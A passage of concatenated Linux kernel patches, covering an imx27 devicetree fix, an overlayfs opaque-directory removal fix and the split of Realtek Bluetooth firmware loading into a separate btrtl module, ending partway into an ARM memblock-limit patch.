u8 dump_num, idx, i, read_reg, doneflag = 0; + u8 dump_num = 0, idx, i, read_reg, doneflag = 0; u32 memory_size, fw_dump_len = 0; /* dump sdio register first */ From a29ef819f3f34f89a1b9b6a939b4c1cdfe1e85ce Mon Sep 17 00:00:00 2001 From: Philippe Reynes Date: Wed, 13 May 2015 00:18:26 +0200 Subject: [PATCH 048/872] ARM: dts: imx27: only map 4 Kbyte for fec registers MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit According to the imx27 documentation, fec has a 4 Kbyte memory space map. Moreover, the actual 16 Kbyte mapping overlaps the SCC (Security Controller) memory register space. So, we reduce the memory register space to 4 Kbyte. 
Signed-off-by: Philippe Reynes Acked-by: Uwe Kleine-König Fixes: 9f0749e3eb88 ("ARM i.MX27: Add devicetree support") Cc: Signed-off-by: Shawn Guo --- arch/arm/boot/dts/imx27.dtsi | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/imx27.dtsi b/arch/arm/boot/dts/imx27.dtsi index 6951b66d1ab7..bc215e4b75fd 100644 --- a/arch/arm/boot/dts/imx27.dtsi +++ b/arch/arm/boot/dts/imx27.dtsi @@ -533,7 +533,7 @@ fec: ethernet@1002b000 { compatible = "fsl,imx27-fec"; - reg = <0x1002b000 0x4000>; + reg = <0x1002b000 0x1000>; interrupts = <50>; clocks = <&clks IMX27_CLK_FEC_IPG_GATE>, <&clks IMX27_CLK_FEC_AHB_GATE>; From d377c5eb54dd05aeb3094b7740252d19ba7791f7 Mon Sep 17 00:00:00 2001 From: Miklos Szeredi Date: Thu, 14 May 2015 10:04:44 +0200 Subject: [PATCH 049/872] ovl: don't remove non-empty opaque directory When removing an opaque directory we can't just call rmdir() to check for emptiness, because the directory will need to be replaced with a whiteout. The replacement is done with RENAME_EXCHANGE, which doesn't check emptiness. Solution is just to check emptiness by reading the directory. In the future we could add a new rename flag to check for emptiness even for RENAME_EXCHANGE to optimize this case. Reported-by: Vincent Batts Signed-off-by: Miklos Szeredi Tested-by: Jordi Pujol Palomer Fixes: 263b4a0fee43 ("ovl: dont replace opaque dir") Cc: # v4.0+ --- fs/overlayfs/dir.c | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/fs/overlayfs/dir.c b/fs/overlayfs/dir.c index d139405d2bfa..2578a0c0677d 100644 --- a/fs/overlayfs/dir.c +++ b/fs/overlayfs/dir.c @@ -506,11 +506,25 @@ static int ovl_remove_and_whiteout(struct dentry *dentry, bool is_dir) struct dentry *opaquedir = NULL; int err; - if (is_dir && OVL_TYPE_MERGE_OR_LOWER(ovl_path_type(dentry))) { - opaquedir = ovl_check_empty_and_clear(dentry); - err = PTR_ERR(opaquedir); - if (IS_ERR(opaquedir)) - goto out; + if (is_dir) { + if (OVL_TYPE_MERGE_OR_LOWER(ovl_path_type(dentry))) { + opaquedir = ovl_check_empty_and_clear(dentry); + err = PTR_ERR(opaquedir); + if (IS_ERR(opaquedir)) + goto out; + } else { + LIST_HEAD(list); + + /* + * When removing an empty opaque directory, then it + * makes no sense to replace it with an exact replica of + * itself. But emptiness still needs to be checked. + */ + err = ovl_check_empty_dir(dentry, &list); + ovl_cache_free(&list); + if (err) + goto out; + } } err = ovl_lock_rename_workdir(workdir, upperdir); From db33c77dddc2ed2cff3061d0b096a9f5ab0c3647 Mon Sep 17 00:00:00 2001 From: Carlo Caione Date: Thu, 14 May 2015 10:49:09 +0200 Subject: [PATCH 050/872] Bluetooth: btrtl: Create separate module for Realtek BT driver As already done for btintel and btbcm export setup as separate function in a vendor-specific module to hold all the Realtek specific commands. 
Signed-off-by: Carlo Caione Signed-off-by: Marcel Holtmann --- drivers/bluetooth/Kconfig | 15 ++ drivers/bluetooth/Makefile | 1 + drivers/bluetooth/btrtl.c | 390 +++++++++++++++++++++++++++++++++++++ drivers/bluetooth/btrtl.h | 52 +++++ drivers/bluetooth/btusb.c | 377 +---------------------------------- 5 files changed, 462 insertions(+), 373 deletions(-) create mode 100644 drivers/bluetooth/btrtl.c create mode 100644 drivers/bluetooth/btrtl.h diff --git a/drivers/bluetooth/Kconfig b/drivers/bluetooth/Kconfig index ed5c2738bea2..2e777071e1dc 100644 --- a/drivers/bluetooth/Kconfig +++ b/drivers/bluetooth/Kconfig @@ -9,6 +9,10 @@ config BT_BCM tristate select FW_LOADER +config BT_RTL + tristate + select FW_LOADER + config BT_HCIBTUSB tristate "HCI USB driver" depends on USB @@ -32,6 +36,17 @@ config BT_HCIBTUSB_BCM Say Y here to compile support for Broadcom protocol. +config BT_HCIBTUSB_RTL + bool "Realtek protocol support" + depends on BT_HCIBTUSB + select BT_RTL + default y + help + The Realtek protocol support enables firmware and configuration + download support for Realtek Bluetooth controllers. + + Say Y here to compile support for Realtek protocol. + config BT_HCIBTSDIO tristate "HCI SDIO driver" depends on MMC diff --git a/drivers/bluetooth/Makefile b/drivers/bluetooth/Makefile index dd0d9c40b999..f40e194e7080 100644 --- a/drivers/bluetooth/Makefile +++ b/drivers/bluetooth/Makefile @@ -21,6 +21,7 @@ obj-$(CONFIG_BT_MRVL) += btmrvl.o obj-$(CONFIG_BT_MRVL_SDIO) += btmrvl_sdio.o obj-$(CONFIG_BT_WILINK) += btwilink.o obj-$(CONFIG_BT_BCM) += btbcm.o +obj-$(CONFIG_BT_RTL) += btrtl.o btmrvl-y := btmrvl_main.o btmrvl-$(CONFIG_DEBUG_FS) += btmrvl_debugfs.o diff --git a/drivers/bluetooth/btrtl.c b/drivers/bluetooth/btrtl.c new file mode 100644 index 000000000000..84288938f7f2 --- /dev/null +++ b/drivers/bluetooth/btrtl.c @@ -0,0 +1,390 @@ +/* + * Bluetooth support for Realtek devices + * + * Copyright (C) 2015 Endless Mobile, Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + */ + +#include +#include +#include +#include + +#include +#include + +#include "btrtl.h" + +#define VERSION "0.1" + +#define RTL_EPATCH_SIGNATURE "Realtech" +#define RTL_ROM_LMP_3499 0x3499 +#define RTL_ROM_LMP_8723A 0x1200 +#define RTL_ROM_LMP_8723B 0x8723 +#define RTL_ROM_LMP_8821A 0x8821 +#define RTL_ROM_LMP_8761A 0x8761 + +static int rtl_read_rom_version(struct hci_dev *hdev, u8 *version) +{ + struct rtl_rom_version_evt *rom_version; + struct sk_buff *skb; + + /* Read RTL ROM version command */ + skb = __hci_cmd_sync(hdev, 0xfc6d, 0, NULL, HCI_INIT_TIMEOUT); + if (IS_ERR(skb)) { + BT_ERR("%s: Read ROM version failed (%ld)", + hdev->name, PTR_ERR(skb)); + return PTR_ERR(skb); + } + + if (skb->len != sizeof(*rom_version)) { + BT_ERR("%s: RTL version event length mismatch", hdev->name); + kfree_skb(skb); + return -EIO; + } + + rom_version = (struct rtl_rom_version_evt *)skb->data; + BT_INFO("%s: rom_version status=%x version=%x", + hdev->name, rom_version->status, rom_version->version); + + *version = rom_version->version; + + kfree_skb(skb); + return 0; +} + +static int rtl8723b_parse_firmware(struct hci_dev *hdev, u16 lmp_subver, + const struct firmware *fw, + unsigned char **_buf) +{ + const u8 extension_sig[] = { 0x51, 0x04, 0xfd, 0x77 }; + struct rtl_epatch_header *epatch_info; + unsigned char *buf; + int i, ret, len; + size_t min_size; + u8 opcode, length, data, rom_version = 0; + int project_id = -1; + const unsigned char *fwptr, *chip_id_base; + const unsigned char *patch_length_base, *patch_offset_base; + u32 patch_offset = 0; + u16 patch_length, num_patches; + const u16 project_id_to_lmp_subver[] = { + RTL_ROM_LMP_8723A, + RTL_ROM_LMP_8723B, + RTL_ROM_LMP_8821A, + RTL_ROM_LMP_8761A + }; + + ret = rtl_read_rom_version(hdev, &rom_version); + if (ret) + return ret; + + min_size = sizeof(struct rtl_epatch_header) + sizeof(extension_sig) + 3; + if (fw->size < min_size) + return -EINVAL; + + fwptr = fw->data + fw->size - sizeof(extension_sig); + if (memcmp(fwptr, extension_sig, sizeof(extension_sig)) != 0) { + BT_ERR("%s: extension section signature mismatch", hdev->name); + return -EINVAL; + } + + /* Loop from the end of the firmware parsing instructions, until + * we find an instruction that identifies the "project ID" for the + * hardware supported by this firwmare file. + * Once we have that, we double-check that that project_id is suitable + * for the hardware we are working with. 
+ */ + while (fwptr >= fw->data + (sizeof(struct rtl_epatch_header) + 3)) { + opcode = *--fwptr; + length = *--fwptr; + data = *--fwptr; + + BT_DBG("check op=%x len=%x data=%x", opcode, length, data); + + if (opcode == 0xff) /* EOF */ + break; + + if (length == 0) { + BT_ERR("%s: found instruction with length 0", + hdev->name); + return -EINVAL; + } + + if (opcode == 0 && length == 1) { + project_id = data; + break; + } + + fwptr -= length; + } + + if (project_id < 0) { + BT_ERR("%s: failed to find version instruction", hdev->name); + return -EINVAL; + } + + if (project_id >= ARRAY_SIZE(project_id_to_lmp_subver)) { + BT_ERR("%s: unknown project id %d", hdev->name, project_id); + return -EINVAL; + } + + if (lmp_subver != project_id_to_lmp_subver[project_id]) { + BT_ERR("%s: firmware is for %x but this is a %x", hdev->name, + project_id_to_lmp_subver[project_id], lmp_subver); + return -EINVAL; + } + + epatch_info = (struct rtl_epatch_header *)fw->data; + if (memcmp(epatch_info->signature, RTL_EPATCH_SIGNATURE, 8) != 0) { + BT_ERR("%s: bad EPATCH signature", hdev->name); + return -EINVAL; + } + + num_patches = le16_to_cpu(epatch_info->num_patches); + BT_DBG("fw_version=%x, num_patches=%d", + le32_to_cpu(epatch_info->fw_version), num_patches); + + /* After the rtl_epatch_header there is a funky patch metadata section. + * Assuming 2 patches, the layout is: + * ChipID1 ChipID2 PatchLength1 PatchLength2 PatchOffset1 PatchOffset2 + * + * Find the right patch for this chip. + */ + min_size += 8 * num_patches; + if (fw->size < min_size) + return -EINVAL; + + chip_id_base = fw->data + sizeof(struct rtl_epatch_header); + patch_length_base = chip_id_base + (sizeof(u16) * num_patches); + patch_offset_base = patch_length_base + (sizeof(u16) * num_patches); + for (i = 0; i < num_patches; i++) { + u16 chip_id = get_unaligned_le16(chip_id_base + + (i * sizeof(u16))); + if (chip_id == rom_version + 1) { + patch_length = get_unaligned_le16(patch_length_base + + (i * sizeof(u16))); + patch_offset = get_unaligned_le32(patch_offset_base + + (i * sizeof(u32))); + break; + } + } + + if (!patch_offset) { + BT_ERR("%s: didn't find patch for chip id %d", + hdev->name, rom_version); + return -EINVAL; + } + + BT_DBG("length=%x offset=%x index %d", patch_length, patch_offset, i); + min_size = patch_offset + patch_length; + if (fw->size < min_size) + return -EINVAL; + + /* Copy the firmware into a new buffer and write the version at + * the end. 
+ */ + len = patch_length; + buf = kmemdup(fw->data + patch_offset, patch_length, GFP_KERNEL); + if (!buf) + return -ENOMEM; + + memcpy(buf + patch_length - 4, &epatch_info->fw_version, 4); + + *_buf = buf; + return len; +} + +static int rtl_download_firmware(struct hci_dev *hdev, + const unsigned char *data, int fw_len) +{ + struct rtl_download_cmd *dl_cmd; + int frag_num = fw_len / RTL_FRAG_LEN + 1; + int frag_len = RTL_FRAG_LEN; + int ret = 0; + int i; + + dl_cmd = kmalloc(sizeof(struct rtl_download_cmd), GFP_KERNEL); + if (!dl_cmd) + return -ENOMEM; + + for (i = 0; i < frag_num; i++) { + struct sk_buff *skb; + + BT_DBG("download fw (%d/%d)", i, frag_num); + + dl_cmd->index = i; + if (i == (frag_num - 1)) { + dl_cmd->index |= 0x80; /* data end */ + frag_len = fw_len % RTL_FRAG_LEN; + } + memcpy(dl_cmd->data, data, frag_len); + + /* Send download command */ + skb = __hci_cmd_sync(hdev, 0xfc20, frag_len + 1, dl_cmd, + HCI_INIT_TIMEOUT); + if (IS_ERR(skb)) { + BT_ERR("%s: download fw command failed (%ld)", + hdev->name, PTR_ERR(skb)); + ret = -PTR_ERR(skb); + goto out; + } + + if (skb->len != sizeof(struct rtl_download_response)) { + BT_ERR("%s: download fw event length mismatch", + hdev->name); + kfree_skb(skb); + ret = -EIO; + goto out; + } + + kfree_skb(skb); + data += RTL_FRAG_LEN; + } + +out: + kfree(dl_cmd); + return ret; +} + +static int btrtl_setup_rtl8723a(struct hci_dev *hdev) +{ + const struct firmware *fw; + int ret; + + BT_INFO("%s: rtl: loading rtl_bt/rtl8723a_fw.bin", hdev->name); + ret = request_firmware(&fw, "rtl_bt/rtl8723a_fw.bin", &hdev->dev); + if (ret < 0) { + BT_ERR("%s: Failed to load rtl_bt/rtl8723a_fw.bin", hdev->name); + return ret; + } + + if (fw->size < 8) { + ret = -EINVAL; + goto out; + } + + /* Check that the firmware doesn't have the epatch signature + * (which is only for RTL8723B and newer). 
+ */ + if (!memcmp(fw->data, RTL_EPATCH_SIGNATURE, 8)) { + BT_ERR("%s: unexpected EPATCH signature!", hdev->name); + ret = -EINVAL; + goto out; + } + + ret = rtl_download_firmware(hdev, fw->data, fw->size); + +out: + release_firmware(fw); + return ret; +} + +static int btrtl_setup_rtl8723b(struct hci_dev *hdev, u16 lmp_subver, + const char *fw_name) +{ + unsigned char *fw_data = NULL; + const struct firmware *fw; + int ret; + + BT_INFO("%s: rtl: loading %s", hdev->name, fw_name); + ret = request_firmware(&fw, fw_name, &hdev->dev); + if (ret < 0) { + BT_ERR("%s: Failed to load %s", hdev->name, fw_name); + return ret; + } + + ret = rtl8723b_parse_firmware(hdev, lmp_subver, fw, &fw_data); + if (ret < 0) + goto out; + + ret = rtl_download_firmware(hdev, fw_data, ret); + kfree(fw_data); + if (ret < 0) + goto out; + +out: + release_firmware(fw); + return ret; +} + +static struct sk_buff *btrtl_read_local_version(struct hci_dev *hdev) +{ + struct sk_buff *skb; + + skb = __hci_cmd_sync(hdev, HCI_OP_READ_LOCAL_VERSION, 0, NULL, + HCI_INIT_TIMEOUT); + if (IS_ERR(skb)) { + BT_ERR("%s: HCI_OP_READ_LOCAL_VERSION failed (%ld)", + hdev->name, PTR_ERR(skb)); + return skb; + } + + if (skb->len != sizeof(struct hci_rp_read_local_version)) { + BT_ERR("%s: HCI_OP_READ_LOCAL_VERSION event length mismatch", + hdev->name); + kfree_skb(skb); + return ERR_PTR(-EIO); + } + + return skb; +} + +int btrtl_setup_realtek(struct hci_dev *hdev) +{ + struct sk_buff *skb; + struct hci_rp_read_local_version *resp; + u16 lmp_subver; + + skb = btrtl_read_local_version(hdev); + if (IS_ERR(skb)) + return -PTR_ERR(skb); + + resp = (struct hci_rp_read_local_version *)skb->data; + BT_INFO("%s: rtl: examining hci_ver=%02x hci_rev=%04x lmp_ver=%02x " + "lmp_subver=%04x", hdev->name, resp->hci_ver, resp->hci_rev, + resp->lmp_ver, resp->lmp_subver); + + lmp_subver = le16_to_cpu(resp->lmp_subver); + kfree_skb(skb); + + /* Match a set of subver values that correspond to stock firmware, + * which is not compatible with standard btusb. + * If matched, upload an alternative firmware that does conform to + * standard btusb. Once that firmware is uploaded, the subver changes + * to a different value. + */ + switch (lmp_subver) { + case RTL_ROM_LMP_8723A: + case RTL_ROM_LMP_3499: + return btrtl_setup_rtl8723a(hdev); + case RTL_ROM_LMP_8723B: + return btrtl_setup_rtl8723b(hdev, lmp_subver, + "rtl_bt/rtl8723b_fw.bin"); + case RTL_ROM_LMP_8821A: + return btrtl_setup_rtl8723b(hdev, lmp_subver, + "rtl_bt/rtl8821a_fw.bin"); + case RTL_ROM_LMP_8761A: + return btrtl_setup_rtl8723b(hdev, lmp_subver, + "rtl_bt/rtl8761a_fw.bin"); + default: + BT_INFO("rtl: assuming no firmware upload needed."); + return 0; + } +} +EXPORT_SYMBOL_GPL(btrtl_setup_realtek); + +MODULE_AUTHOR("Daniel Drake "); +MODULE_DESCRIPTION("Bluetooth support for Realtek devices ver " VERSION); +MODULE_VERSION(VERSION); +MODULE_LICENSE("GPL"); diff --git a/drivers/bluetooth/btrtl.h b/drivers/bluetooth/btrtl.h new file mode 100644 index 000000000000..38ffe4890cd1 --- /dev/null +++ b/drivers/bluetooth/btrtl.h @@ -0,0 +1,52 @@ +/* + * Bluetooth support for Realtek devices + * + * Copyright (C) 2015 Endless Mobile, Inc. + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + */ + +#define RTL_FRAG_LEN 252 + +struct rtl_download_cmd { + __u8 index; + __u8 data[RTL_FRAG_LEN]; +} __packed; + +struct rtl_download_response { + __u8 status; + __u8 index; +} __packed; + +struct rtl_rom_version_evt { + __u8 status; + __u8 version; +} __packed; + +struct rtl_epatch_header { + __u8 signature[8]; + __le32 fw_version; + __le16 num_patches; +} __packed; + +#if IS_ENABLED(CONFIG_BT_RTL) + +int btrtl_setup_realtek(struct hci_dev *hdev); + +#else + +static inline int btrtl_setup_realtek(struct hci_dev *hdev) +{ + return -EOPNOTSUPP; +} + +#endif diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index d21f3b4176d3..df87016d18ab 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -31,6 +31,7 @@ #include "btintel.h" #include "btbcm.h" +#include "btrtl.h" #define VERSION "0.8" @@ -1369,378 +1370,6 @@ static int btusb_setup_csr(struct hci_dev *hdev) return ret; } -#define RTL_FRAG_LEN 252 - -struct rtl_download_cmd { - __u8 index; - __u8 data[RTL_FRAG_LEN]; -} __packed; - -struct rtl_download_response { - __u8 status; - __u8 index; -} __packed; - -struct rtl_rom_version_evt { - __u8 status; - __u8 version; -} __packed; - -struct rtl_epatch_header { - __u8 signature[8]; - __le32 fw_version; - __le16 num_patches; -} __packed; - -#define RTL_EPATCH_SIGNATURE "Realtech" -#define RTL_ROM_LMP_3499 0x3499 -#define RTL_ROM_LMP_8723A 0x1200 -#define RTL_ROM_LMP_8723B 0x8723 -#define RTL_ROM_LMP_8821A 0x8821 -#define RTL_ROM_LMP_8761A 0x8761 - -static int rtl_read_rom_version(struct hci_dev *hdev, u8 *version) -{ - struct rtl_rom_version_evt *rom_version; - struct sk_buff *skb; - int ret; - - /* Read RTL ROM version command */ - skb = __hci_cmd_sync(hdev, 0xfc6d, 0, NULL, HCI_INIT_TIMEOUT); - if (IS_ERR(skb)) { - BT_ERR("%s: Read ROM version failed (%ld)", - hdev->name, PTR_ERR(skb)); - return PTR_ERR(skb); - } - - if (skb->len != sizeof(*rom_version)) { - BT_ERR("%s: RTL version event length mismatch", hdev->name); - kfree_skb(skb); - return -EIO; - } - - rom_version = (struct rtl_rom_version_evt *)skb->data; - BT_INFO("%s: rom_version status=%x version=%x", - hdev->name, rom_version->status, rom_version->version); - - ret = rom_version->status; - if (ret == 0) - *version = rom_version->version; - - kfree_skb(skb); - return ret; -} - -static int rtl8723b_parse_firmware(struct hci_dev *hdev, u16 lmp_subver, - const struct firmware *fw, - unsigned char **_buf) -{ - const u8 extension_sig[] = { 0x51, 0x04, 0xfd, 0x77 }; - struct rtl_epatch_header *epatch_info; - unsigned char *buf; - int i, ret, len; - size_t min_size; - u8 opcode, length, data, rom_version = 0; - int project_id = -1; - const unsigned char *fwptr, *chip_id_base; - const unsigned char *patch_length_base, *patch_offset_base; - u32 patch_offset = 0; - u16 patch_length, num_patches; - const u16 project_id_to_lmp_subver[] = { - RTL_ROM_LMP_8723A, - RTL_ROM_LMP_8723B, - RTL_ROM_LMP_8821A, - RTL_ROM_LMP_8761A - }; - - ret = rtl_read_rom_version(hdev, &rom_version); - if (ret) - return -bt_to_errno(ret); - - min_size = sizeof(struct rtl_epatch_header) + sizeof(extension_sig) + 3; - if (fw->size < min_size) - return -EINVAL; - - fwptr = fw->data + fw->size - sizeof(extension_sig); - if (memcmp(fwptr, extension_sig, sizeof(extension_sig)) != 
0) { - BT_ERR("%s: extension section signature mismatch", hdev->name); - return -EINVAL; - } - - /* Loop from the end of the firmware parsing instructions, until - * we find an instruction that identifies the "project ID" for the - * hardware supported by this firwmare file. - * Once we have that, we double-check that that project_id is suitable - * for the hardware we are working with. - */ - while (fwptr >= fw->data + (sizeof(struct rtl_epatch_header) + 3)) { - opcode = *--fwptr; - length = *--fwptr; - data = *--fwptr; - - BT_DBG("check op=%x len=%x data=%x", opcode, length, data); - - if (opcode == 0xff) /* EOF */ - break; - - if (length == 0) { - BT_ERR("%s: found instruction with length 0", - hdev->name); - return -EINVAL; - } - - if (opcode == 0 && length == 1) { - project_id = data; - break; - } - - fwptr -= length; - } - - if (project_id < 0) { - BT_ERR("%s: failed to find version instruction", hdev->name); - return -EINVAL; - } - - if (project_id >= ARRAY_SIZE(project_id_to_lmp_subver)) { - BT_ERR("%s: unknown project id %d", hdev->name, project_id); - return -EINVAL; - } - - if (lmp_subver != project_id_to_lmp_subver[project_id]) { - BT_ERR("%s: firmware is for %x but this is a %x", hdev->name, - project_id_to_lmp_subver[project_id], lmp_subver); - return -EINVAL; - } - - epatch_info = (struct rtl_epatch_header *)fw->data; - if (memcmp(epatch_info->signature, RTL_EPATCH_SIGNATURE, 8) != 0) { - BT_ERR("%s: bad EPATCH signature", hdev->name); - return -EINVAL; - } - - num_patches = le16_to_cpu(epatch_info->num_patches); - BT_DBG("fw_version=%x, num_patches=%d", - le32_to_cpu(epatch_info->fw_version), num_patches); - - /* After the rtl_epatch_header there is a funky patch metadata section. - * Assuming 2 patches, the layout is: - * ChipID1 ChipID2 PatchLength1 PatchLength2 PatchOffset1 PatchOffset2 - * - * Find the right patch for this chip. - */ - min_size += 8 * num_patches; - if (fw->size < min_size) - return -EINVAL; - - chip_id_base = fw->data + sizeof(struct rtl_epatch_header); - patch_length_base = chip_id_base + (sizeof(u16) * num_patches); - patch_offset_base = patch_length_base + (sizeof(u16) * num_patches); - for (i = 0; i < num_patches; i++) { - u16 chip_id = get_unaligned_le16(chip_id_base + - (i * sizeof(u16))); - if (chip_id == rom_version + 1) { - patch_length = get_unaligned_le16(patch_length_base + - (i * sizeof(u16))); - patch_offset = get_unaligned_le32(patch_offset_base + - (i * sizeof(u32))); - break; - } - } - - if (!patch_offset) { - BT_ERR("%s: didn't find patch for chip id %d", - hdev->name, rom_version); - return -EINVAL; - } - - BT_DBG("length=%x offset=%x index %d", patch_length, patch_offset, i); - min_size = patch_offset + patch_length; - if (fw->size < min_size) - return -EINVAL; - - /* Copy the firmware into a new buffer and write the version at - * the end. 
- */ - len = patch_length; - buf = kmemdup(fw->data + patch_offset, patch_length, GFP_KERNEL); - if (!buf) - return -ENOMEM; - - memcpy(buf + patch_length - 4, &epatch_info->fw_version, 4); - - *_buf = buf; - return len; -} - -static int rtl_download_firmware(struct hci_dev *hdev, - const unsigned char *data, int fw_len) -{ - struct rtl_download_cmd *dl_cmd; - int frag_num = fw_len / RTL_FRAG_LEN + 1; - int frag_len = RTL_FRAG_LEN; - int ret = 0; - int i; - - dl_cmd = kmalloc(sizeof(struct rtl_download_cmd), GFP_KERNEL); - if (!dl_cmd) - return -ENOMEM; - - for (i = 0; i < frag_num; i++) { - struct rtl_download_response *dl_resp; - struct sk_buff *skb; - - BT_DBG("download fw (%d/%d)", i, frag_num); - - dl_cmd->index = i; - if (i == (frag_num - 1)) { - dl_cmd->index |= 0x80; /* data end */ - frag_len = fw_len % RTL_FRAG_LEN; - } - memcpy(dl_cmd->data, data, frag_len); - - /* Send download command */ - skb = __hci_cmd_sync(hdev, 0xfc20, frag_len + 1, dl_cmd, - HCI_INIT_TIMEOUT); - if (IS_ERR(skb)) { - BT_ERR("%s: download fw command failed (%ld)", - hdev->name, PTR_ERR(skb)); - ret = -PTR_ERR(skb); - goto out; - } - - if (skb->len != sizeof(*dl_resp)) { - BT_ERR("%s: download fw event length mismatch", - hdev->name); - kfree_skb(skb); - ret = -EIO; - goto out; - } - - dl_resp = (struct rtl_download_response *)skb->data; - if (dl_resp->status != 0) { - kfree_skb(skb); - ret = bt_to_errno(dl_resp->status); - goto out; - } - - kfree_skb(skb); - data += RTL_FRAG_LEN; - } - -out: - kfree(dl_cmd); - return ret; -} - -static int btusb_setup_rtl8723a(struct hci_dev *hdev) -{ - struct btusb_data *data = dev_get_drvdata(&hdev->dev); - struct usb_device *udev = interface_to_usbdev(data->intf); - const struct firmware *fw; - int ret; - - BT_INFO("%s: rtl: loading rtl_bt/rtl8723a_fw.bin", hdev->name); - ret = request_firmware(&fw, "rtl_bt/rtl8723a_fw.bin", &udev->dev); - if (ret < 0) { - BT_ERR("%s: Failed to load rtl_bt/rtl8723a_fw.bin", hdev->name); - return ret; - } - - if (fw->size < 8) { - ret = -EINVAL; - goto out; - } - - /* Check that the firmware doesn't have the epatch signature - * (which is only for RTL8723B and newer). 
- */ - if (!memcmp(fw->data, RTL_EPATCH_SIGNATURE, 8)) { - BT_ERR("%s: unexpected EPATCH signature!", hdev->name); - ret = -EINVAL; - goto out; - } - - ret = rtl_download_firmware(hdev, fw->data, fw->size); - -out: - release_firmware(fw); - return ret; -} - -static int btusb_setup_rtl8723b(struct hci_dev *hdev, u16 lmp_subver, - const char *fw_name) -{ - struct btusb_data *data = dev_get_drvdata(&hdev->dev); - struct usb_device *udev = interface_to_usbdev(data->intf); - unsigned char *fw_data = NULL; - const struct firmware *fw; - int ret; - - BT_INFO("%s: rtl: loading %s", hdev->name, fw_name); - ret = request_firmware(&fw, fw_name, &udev->dev); - if (ret < 0) { - BT_ERR("%s: Failed to load %s", hdev->name, fw_name); - return ret; - } - - ret = rtl8723b_parse_firmware(hdev, lmp_subver, fw, &fw_data); - if (ret < 0) - goto out; - - ret = rtl_download_firmware(hdev, fw_data, ret); - kfree(fw_data); - if (ret < 0) - goto out; - -out: - release_firmware(fw); - return ret; -} - -static int btusb_setup_realtek(struct hci_dev *hdev) -{ - struct sk_buff *skb; - struct hci_rp_read_local_version *resp; - u16 lmp_subver; - - skb = btusb_read_local_version(hdev); - if (IS_ERR(skb)) - return -PTR_ERR(skb); - - resp = (struct hci_rp_read_local_version *)skb->data; - BT_INFO("%s: rtl: examining hci_ver=%02x hci_rev=%04x lmp_ver=%02x " - "lmp_subver=%04x", hdev->name, resp->hci_ver, resp->hci_rev, - resp->lmp_ver, resp->lmp_subver); - - lmp_subver = le16_to_cpu(resp->lmp_subver); - kfree_skb(skb); - - /* Match a set of subver values that correspond to stock firmware, - * which is not compatible with standard btusb. - * If matched, upload an alternative firmware that does conform to - * standard btusb. Once that firmware is uploaded, the subver changes - * to a different value. - */ - switch (lmp_subver) { - case RTL_ROM_LMP_8723A: - case RTL_ROM_LMP_3499: - return btusb_setup_rtl8723a(hdev); - case RTL_ROM_LMP_8723B: - return btusb_setup_rtl8723b(hdev, lmp_subver, - "rtl_bt/rtl8723b_fw.bin"); - case RTL_ROM_LMP_8821A: - return btusb_setup_rtl8723b(hdev, lmp_subver, - "rtl_bt/rtl8821a_fw.bin"); - case RTL_ROM_LMP_8761A: - return btusb_setup_rtl8723b(hdev, lmp_subver, - "rtl_bt/rtl8761a_fw.bin"); - default: - BT_INFO("rtl: assuming no firmware upload needed."); - return 0; - } -} - static const struct firmware *btusb_setup_intel_get_fw(struct hci_dev *hdev, struct intel_version *ver) { @@ -3172,8 +2801,10 @@ static int btusb_probe(struct usb_interface *intf, hdev->set_bdaddr = btusb_set_bdaddr_ath3012; } +#ifdef CONFIG_BT_HCIBTUSB_RTL if (id->driver_info & BTUSB_REALTEK) - hdev->setup = btusb_setup_realtek; + hdev->setup = btrtl_setup_realtek; +#endif if (id->driver_info & BTUSB_AMP) { /* AMP controllers do not support SCO packets */ From 965278dcb8ab0b1f666cc47937933c4be4aea48d Mon Sep 17 00:00:00 2001 From: Mark Rutland Date: Wed, 13 May 2015 15:07:54 +0100 Subject: [PATCH 051/872] ARM: 8356/1: mm: handle non-pmd-aligned end of RAM At boot time we round the memblock limit down to section size in an attempt to ensure that we will have mapped this RAM with section mappings prior to allocating from it. When mapping RAM we iterate over PMD-sized chunks, creating these section mappings. Section mappings are only created when the end of a chunk is aligned to section size. Unfortunately, with classic page tables (where PMD_SIZE is 2 * SECTION_SIZE) this means that if a chunk is between 1M and 2M in size the first 1M will not be mapped despite having been accounted for in the memblock limit. 
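As a worked example with illustrative addresses: on classic page tables SECTION_SIZE is 1MiB and PMD_SIZE is 2MiB, so a lowmem region ending at 0x40300000 gives a memblock limit that is section-aligned but sits in the middle of the PMD spanning 0x40200000-0x40400000; that final 1MiB chunk is not guaranteed a section mapping, yet memblock may still hand out pages from it. Rounding the limit down to PMD_SIZE (0x40200000 in this example) keeps early allocations inside memory that is certain to be mapped.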
This has been observed to result in page tables being allocated from unmapped memory, causing boot-time hangs. This patch modifies the memblock limit rounding to always round down to PMD_SIZE instead of SECTION_SIZE. For classic MMU this means that we will round the memblock limit down to a 2M boundary, matching the limits on section mappings, and preventing allocations from unmapped memory. For LPAE there should be no change as PMD_SIZE == SECTION_SIZE. Signed-off-by: Mark Rutland Reported-by: Stefan Agner Tested-by: Stefan Agner Acked-by: Laura Abbott Tested-by: Hans de Goede Cc: Catalin Marinas Cc: Steve Capper Cc: stable@vger.kernel.org Signed-off-by: Russell King --- arch/arm/mm/mmu.c | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/arch/arm/mm/mmu.c b/arch/arm/mm/mmu.c index 4e6ef896c619..7186382672b5 100644 --- a/arch/arm/mm/mmu.c +++ b/arch/arm/mm/mmu.c @@ -1112,22 